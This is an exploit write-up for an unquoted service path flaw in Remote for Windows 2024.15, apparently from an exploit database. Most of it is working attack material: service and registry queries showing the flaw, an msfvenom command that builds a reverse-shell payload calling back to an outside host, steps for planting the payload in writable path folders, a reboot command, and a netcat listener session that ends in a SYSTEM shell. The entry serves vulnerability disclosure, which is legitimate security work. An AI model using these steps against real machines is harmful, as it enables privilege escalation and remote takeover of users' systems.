Remote for Windows 2024.15 Unquoted Service Path

# Exploit Title: Remote for Windows 2024.15 - Unquoted Service # Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)


Description:

The Remote4WindowsService installs with an unquoted service path and runs
as LocalSystem.


C:\>sc qc Remote4WindowsService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Remote4WindowsService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Evgeny Cherpak\Remote for
Windows\Remote4WindowsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Remote4WindowsService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\>


PS C:\> reg query
"HKLM\SYSTEM\CurrentControlSet\Services\Remote4WindowsService" /v ImagePath

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Remote4WindowsService
ImagePath REG_EXPAND_SZ C:\Program Files\Evgeny Cherpak\Remote
for Windows\Remote4WindowsService.exe

PS C:\>

# Steps to Reproduce:

1. generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8081 -f exe
> shell.exe

2. move the shell.exe to: (if writable)
"c:\" or
"C:\Program Files\" or
"C:\Program Files\Evgeny Cherpak\" or
"C:\Program Files\Evgeny Cherpak\Remote for Windows\"



restart windows: shutdown /r /t 1

catch the shell as SYSTEM

$nc -lnvp 8081
listening on [any] 8081 ...
connect to [192.168.8.101] from (UNKNOWN) [192.168.8.105] 49672
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>